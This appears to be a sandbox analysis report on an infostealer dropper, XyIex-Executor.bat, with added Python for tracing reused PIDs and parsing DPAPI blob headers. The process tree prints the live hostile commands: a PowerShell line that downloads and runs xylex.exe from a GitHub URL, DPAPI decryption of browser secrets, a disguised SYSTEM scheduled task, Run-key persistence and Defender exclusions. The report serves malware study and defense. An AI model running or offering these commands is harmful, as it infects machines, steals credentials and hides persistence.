Analysis

max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-06-2024 09:04

Static task: static1
Behavioral task: behavioral1
Sample: XyIex-Executor.bat
Resource: win10v2004-20240508-en

General

Target: XyIex-Executor.bat
Size: 244B
MD5: ac122c56306baae12bc1dbc69455249a
SHA1: 8f7be0cb0c88260843111257c349f5e2a0fa5b1a
SHA256: 702d2a9930bf8d16752c3dbe1d5b5382c592c13e85e54fe0cd59df2ad4f764db
SHA512: a66df3c5a8c21561dad7ffba4eecc132fce6388797dabdd63eaa6d077d8ebf0298a0220331b0a8f28208a80f1b4cf3ec1ce74a76cf61b428bf03f2d2e637951b

Malware Config

Extracted URL: https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe
Signatures

Blocklisted process makes network request (3 IoCs)
  flow 7   pid 4380  powershell.exe
  flow 13  pid 4380  powershell.exe
  flow 42  pid 2360  curl.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 5 IoCs)
Runs PowerShell with a hidden display window.
  pid 3876  powershell.exe
  pid 4996  powershell.exe
  pid 2708  powershell.exe
  pid 736   powershell.exe
  pid 4412  powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
  Key value queried  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation  xylex.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation  cscript.exe

Executes dropped EXE (1 IoC)
  pid 3260  xylex.exe

Loads dropped DLL (1 IoC)
  pid 3260  xylex.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Adds Run key to start application (2 TTPs, 2 IoCs)
  Set value (str)  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\jYXcOByvlSUdhPk.ps1\""  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xylex.exe"  reg.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 39  api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection (2 IoCs)
  pid 3292  cmd.exe
  pid 2884  cmd.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000  taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName  taskmgr.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Detects videocard installed (1 TTP, 10 IoCs)
Uses WMIC.exe to determine the installed video card.
  pid 2260, 1504, 2260, 5000, 2100, 5032, 2884, 2940, 60, 3140  WMIC.exe

Enumerates processes with tasklist (1 TTP, 2 IoCs)
  pid 1140  tasklist.exe
  pid 2224  tasklist.exe

Modifies registry class (1 IoC)
  Key created  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings  taskmgr.exe

Modifies registry key (1 TTP, 2 IoCs)

Opens file in notepad (likely ransom note) (1 IoC)
  pid 2636  NOTEPAD.EXE (this PID does not appear in the process tree below)

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  powershell.exe: pid 4380 (x2), 4996 (x3), 3444 (x3), 4788 (x3), 3876 (x3), 736 (x3), 4516 (x3), 4412 (x3), 2396 (x3), 1364 (x3), 2708 (x3), 4260 (x3), 3196 (x3), 2084 (x3), 4248 (x3), 3016 (x3), 2476 (x3)
  xylex.exe: pid 3260 (x3)
  taskmgr.exe: pid 3920 (x11)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid 3920  taskmgr.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  SeDebugPrivilege  4380 powershell.exe
  SeDebugPrivilege  4996 powershell.exe
  SeDebugPrivilege  1140 tasklist.exe
  SeDebugPrivilege  2224 tasklist.exe
  SeDebugPrivilege  3444 powershell.exe
  SeDebugPrivilege  4788 powershell.exe
  2020 WMIC.exe, 21 tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  4804 WMIC.exe, the same 21 tokens
  SeDebugPrivilege  3876 powershell.exe
  2020 WMIC.exe again, the first 15 tokens of the list above (SeIncreaseQuotaPrivilege through SeRemoteShutdownPrivilege); the report caps the list at 64 entries

Suspicious use of FindShellTrayWindow (64 IoCs)
  pid 3920  taskmgr.exe (64 entries)

Suspicious use of SendNotifyMessage (64 IoCs)
  pid 3920  taskmgr.exe (64 entries)

Suspicious use of WriteProcessMemory (64 IoCs)
Each parent -> child pair below is reported twice in the source list.
  4472 cmd.exe -> 4380 powershell.exe
  4380 powershell.exe -> 3260 xylex.exe
  3260 xylex.exe -> 3508 cmd.exe
  3508 cmd.exe -> 1956 cmd.exe
  3508 cmd.exe -> 4996 powershell.exe
  4996 powershell.exe -> 3688 csc.exe
  3688 csc.exe -> 1268 cvtres.exe
  3260 xylex.exe -> 1276 cmd.exe
  1276 cmd.exe -> 3452 curl.exe
  3260 xylex.exe -> 3440 cmd.exe
  3440 cmd.exe -> 1140 tasklist.exe
  3260 xylex.exe -> 4496 cmd.exe
  3260 xylex.exe -> 3292 cmd.exe
  4496 cmd.exe -> 2224 tasklist.exe
  3292 cmd.exe -> 3444 powershell.exe
  3260 xylex.exe -> 2884 cmd.exe
  2884 cmd.exe -> 4788 powershell.exe
  3260 xylex.exe -> 3472 cmd.exe
  3260 xylex.exe -> 896 cmd.exe
  3260 xylex.exe -> 4048 cmd.exe
  3260 xylex.exe -> 644 cmd.exe
  3260 xylex.exe -> 4324 cmd.exe
  896 cmd.exe -> 1084 reg.exe
  3472 cmd.exe -> 2020 WMIC.exe
  4048 cmd.exe -> 5084 schtasks.exe
  644 cmd.exe -> 3876 powershell.exe
  4324 cmd.exe -> 4804 curl.exe
  3260 xylex.exe -> 1956 cmd.exe
  1956 cmd.exe -> 1608 cscript.exe
  3260 xylex.exe -> 760 cmd.exe
  760 cmd.exe -> 4756 WMIC.exe
  3260 xylex.exe -> 2796 WMIC.exe

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
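The WriteProcessMemory list above keys everything on PID, and the sandbox reused several PIDs inside the 150 s run: 1956 is reported as a child of both 3508 and 3260, and 4804 is curl.exe in the IoC text but WMIC.exe in the process tree below (4996, 2884, 2796 and 3444 are likewise reused between unrelated processes). Any lineage reconstruction from such a report has to treat a PID as ambiguous once that happens. The Python below is an added example, not part of the report, that parses an excerpt of the IoC text exactly as it appears on this page, rebuilds parent/child relations, and flags PIDs that cannot be a single process. TREE_IMAGES is a small constructed lookup copied by hand from the process tree for the cross-check.

```python
"""Rebuild parent/child relations from a sandbox WriteProcessMemory IoC list and
flag PIDs the report attributes to more than one process (PID reuse)."""
import re
from collections import defaultdict

# Excerpt of the "Suspicious use of WriteProcessMemory" text copied from the report.
# The report lists every pair twice; one copy of each is kept here.
WPM_TEXT = (
    "PID 4472 wrote to memory of 4380 4472 cmd.exe powershell.exe "
    "PID 4380 wrote to memory of 3260 4380 powershell.exe xylex.exe "
    "PID 3260 wrote to memory of 3508 3260 xylex.exe cmd.exe "
    "PID 3508 wrote to memory of 1956 3508 cmd.exe cmd.exe "
    "PID 3508 wrote to memory of 4996 3508 cmd.exe powershell.exe "
    "PID 3260 wrote to memory of 4324 3260 xylex.exe cmd.exe "
    "PID 4324 wrote to memory of 4804 4324 cmd.exe curl.exe "
    "PID 3260 wrote to memory of 1956 3260 xylex.exe cmd.exe "
    "PID 1956 wrote to memory of 1608 1956 cmd.exe cscript.exe"
)

# Image names the process tree on this page gives for some of the same PIDs
# (constructed lookup, filled in by hand from the tree).
TREE_IMAGES = {4804: "WMIC.exe", 1956: "cmd.exe", 4996: "powershell.exe"}

# "PID <parent> wrote to memory of <child> <parent> <parent image> <child image>"
PAIR_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")


def parse_pairs(text):
    """-> list of (parent_pid, child_pid, parent_image, child_image)."""
    return [(int(p), int(c), pi, ci) for p, c, pi, ci in PAIR_RE.findall(text)]


def parents_of(pairs):
    """child pid -> set of parent pids seen for it."""
    out = defaultdict(set)
    for parent, child, _, _ in pairs:
        out[child].add(parent)
    return dict(out)


def reused_pids(pairs, tree_images=TREE_IMAGES):
    """PIDs that cannot belong to one process: more than one parent in the IoC
    text, or an image name that disagrees with the process tree."""
    suspects = {}
    for child, parents in parents_of(pairs).items():
        if len(parents) > 1:
            suspects[child] = f"parents {sorted(parents)}"
    for _, child, _, child_image in pairs:
        tree_name = tree_images.get(child)
        if tree_name and tree_name.lower() != child_image.lower():
            suspects[child] = f"{child_image} in IoC text vs {tree_name} in process tree"
    return suspects


def lineage(pairs, pid):
    """Walk from pid up to the root, stopping at the first ambiguous parent."""
    parents = parents_of(pairs)
    chain = [pid]
    while pid in parents and len(parents[pid]) == 1:
        pid = next(iter(parents[pid]))
        chain.append(pid)
    return chain[::-1]


if __name__ == "__main__":
    pairs = parse_pairs(WPM_TEXT)
    for pid, why in sorted(reused_pids(pairs).items()):
        print(f"PID {pid} is ambiguous: {why}")
    print("lineage of 4996:", lineage(pairs, 4996))
    print("lineage of 1608:", lineage(pairs, 1608))
```

On the excerpt this reports 1956 (two parents) and 4804 (curl.exe vs WMIC.exe), walks 4996 back to the cmd.exe that launched the .bat, and refuses to walk 1608 past 1956. When building IoCs from a report like this, key on the command line and the parent command line rather than on the PID alone.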
Processes

[1] PID 4472  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XyIex-Executor.bat"
    signatures: Suspicious use of WriteProcessMemory
  [2] PID 4380  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
      signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    [3] PID 3260  C:\Users\Admin\AppData\Local\Temp\xylex.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\xylex.exe"
        signatures: Checks computer location settings; Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      [4] PID 3508  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1956  C:\Windows\system32\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        [5] PID 4996  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell.exe -noprofile -
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          [6] PID 3688  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\znzi4rtn\znzi4rtn.cmdline"
              signatures: Suspicious use of WriteProcessMemory
            [7] PID 1268  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E58.tmp" "c:\Users\Admin\AppData\Local\Temp\znzi4rtn\CSC3B7EE9778B6E4BF4A4CE555DFFC4CC12.TMP"
      [4] PID 1276  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 3452  C:\Windows\system32\curl.exe
            cmdline: curl http://api.ipify.org/ --ssl-no-revoke
      [4] PID 3440  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1140  C:\Windows\system32\tasklist.exe
            cmdline: tasklist
            signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      [4] PID 4496  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 2224  C:\Windows\system32\tasklist.exe
            cmdline: tasklist
            signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      [4] PID 3292  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"
          signatures: An obfuscated cmd.exe command-line is typically used to evade detection; Suspicious use of WriteProcessMemory
        [5] PID 3444  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      [4] PID 2884  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"
          signatures: An obfuscated cmd.exe command-line is typically used to evade detection; Suspicious use of WriteProcessMemory
        [5] PID 4788  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
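Both Unprotect calls above hand PowerShell a literal DPAPI blob (the output of CryptProtectData) and ask for it to be decrypted in the CurrentUser scope, which only succeeds on the victim's own account; that is the usual way an infostealer recovers secrets a browser protected with DPAPI, and it lines up with the "Reads user/profile data of web browsers" signature. The blob header is readable without the master key. The Python below is an added example, not from the report or from the sample, that embeds the second blob verbatim and parses it using the documented CryptProtectData blob layout (version, provider GUID, master key GUID, flags, description, cipher and hash ALG_IDs, salt, HMAC keys, ciphertext, signature). The first blob has the same layout with an empty description. master_key_path and the SID handed to it are illustrative; the SID is the one from the report's registry IoCs.

```python
"""Parse the header of a Windows DPAPI blob (CryptProtectData output) without
decrypting it, to learn which master key it needs and how it was labelled."""
import struct
import uuid

# Provider GUID that every CryptProtectData blob carries at offset 4.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_IDs commonly seen in DPAPI blobs.
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}

# Second blob from the process tree (cmd.exe PID 2884 -> powershell.exe PID 4788),
# copied verbatim from the report and split at the structure boundaries.
BLOB_EDGE = bytes([
    1, 0, 0, 0,                                                          # dwVersion
    208, 140, 157, 223, 1, 21, 209, 17, 140, 122, 0, 192, 79, 194, 151, 235,  # guidProvider
    1, 0, 0, 0,                                                          # dwMasterKeyVersion
    123, 210, 181, 210, 198, 217, 30, 79, 143, 44, 142, 139, 125, 65, 164, 21,  # guidMasterKey
    16, 0, 0, 0,                                                         # dwFlags
    10, 0, 0, 0, 69, 0, 100, 0, 103, 0, 101, 0, 0, 0,                    # szDescription (UTF-16LE)
    16, 102, 0, 0, 0, 1, 0, 0,                                           # algCrypt, dwAlgCryptLen
    32, 0, 0, 0, 169, 185, 211, 78, 126, 178, 233, 113, 146, 165, 226, 217, 166, 46, 54, 58,
    7, 126, 2, 46, 52, 51, 8, 33, 165, 252, 252, 33, 23, 55, 170, 117,   # pbSalt
    0, 0, 0, 0,                                                          # pbHmacKey (empty)
    14, 128, 0, 0, 0, 2, 0, 0,                                           # algHash, dwAlgHashLen
    32, 0, 0, 0, 17, 11, 201, 141, 126, 201, 93, 71, 249, 169, 78, 142, 80, 33, 175, 239,
    206, 207, 106, 1, 120, 226, 109, 40, 148, 210, 70, 217, 136, 37, 103, 93,  # pbHmac2Key
    48, 0, 0, 0, 196, 143, 154, 93, 178, 189, 8, 54, 194, 213, 193, 83, 116, 53, 243, 111,
    111, 77, 200, 213, 127, 10, 114, 6, 231, 115, 160, 210, 133, 174, 254, 89,
    248, 212, 39, 71, 125, 70, 83, 162, 94, 87, 174, 78, 120, 53, 111, 193,  # pbData (ciphertext)
    64, 0, 0, 0, 230, 177, 176, 152, 136, 15, 179, 107, 163, 31, 172, 7, 147, 247, 157, 248,
    126, 206, 103, 252, 231, 212, 64, 164, 231, 127, 156, 232, 77, 46, 46, 112,
    8, 236, 160, 141, 113, 40, 61, 129, 30, 155, 244, 246, 72, 26, 227, 154,
    16, 181, 136, 68, 101, 194, 90, 66, 46, 20, 238, 131, 114, 189, 199, 162,  # pbSign (HMAC)
])


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _guid(buf, off):
    # DPAPI stores GUIDs in the Windows little-endian layout.
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16


def _block(buf, off):
    """DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("length field runs past the end of the blob")
    return bytes(buf[off:off + n]), off + n


def parse_dpapi_blob(buf):
    """Return the header fields of a CryptProtectData blob; raises on malformed input."""
    version, off = _u32(buf, 0)
    provider, off = _guid(buf, off)
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    _mk_version, off = _u32(buf, off)
    master_key, off = _guid(buf, off)
    flags, off = _u32(buf, off)
    desc, off = _block(buf, off)
    alg_crypt, off = _u32(buf, off)
    alg_crypt_bits, off = _u32(buf, off)
    salt, off = _block(buf, off)
    _hmac_key, off = _block(buf, off)
    alg_hash, off = _u32(buf, off)
    alg_hash_bits, off = _u32(buf, off)
    _hmac2_key, off = _block(buf, off)
    data, off = _block(buf, off)
    sign, off = _block(buf, off)
    if off != len(buf):
        raise ValueError(f"{len(buf) - off} trailing bytes after pbSign")
    return {
        "master_key_guid": str(master_key),
        "flags": flags,
        "description": desc.decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_bits": alg_crypt_bits,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "alg_hash_bits": alg_hash_bits,
        "salt_len": len(salt),
        "ciphertext_len": len(data),
        "sign_len": len(sign),
    }


def master_key_path(info, sid):
    """Per-user master key file this blob depends on (illustrative helper)."""
    return "%APPDATA%\\Microsoft\\Protect\\" + sid + "\\" + info["master_key_guid"]


if __name__ == "__main__":
    info = parse_dpapi_blob(BLOB_EDGE)
    for key, value in info.items():
        print(f"{key}: {value}")
    print(master_key_path(info, "S-1-5-21-1337824034-2731376981-3755436523-1000"))
```

On the second blob this yields master key GUID d2b5d27b-d9c6-4f1e-8f2c-8e8b7d41a415, description "Edge", AES-256 with SHA-512, a 48-byte ciphertext and a 64-byte signature; the first blob references the same master key with an empty description. "Edge" is simply the label the protecting application passed to CryptProtectData, and the page does not show the decrypted bytes, so the browser attribution is consistent with the evidence rather than proven by it. The master key GUID names the file under %APPDATA%\Microsoft\Protect\<SID>\ that any offline decryption (with the user's credentials or a domain backup key) would need.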
      [4] PID 3472  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 2020  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic diskdrive get serialnumber
            signatures: Suspicious use of AdjustPrivilegeToken
      [4] PID 896  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1084  C:\Windows\system32\reg.exe
            cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
      [4] PID 4048  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 5084  C:\Windows\system32\schtasks.exe
            cmdline: schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
            signatures: Creates scheduled task(s)
      [4] PID 644  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 3876  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
            signatures: Command and Scripting Interpreter: PowerShell; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          [6] PID 2476  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sphyr0xn\sphyr0xn.cmdline"
            [7] PID 1156  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES857C.tmp" "c:\Users\Admin\AppData\Local\Temp\sphyr0xn\CSC96AECEE9D8134FC2BA75CC82A3D0DE.TMP"
      [4] PID 4324  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 4804  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic bios get smbiosbiosversion
            signatures: Suspicious use of AdjustPrivilegeToken
      [4] PID 1956  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 1608  C:\Windows\system32\cscript.exe
            cmdline: cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
            signatures: Checks computer location settings
          [6] PID 4644  C:\Windows\system32\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
            [7] PID 736  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
            [7] PID 4412  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
                signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
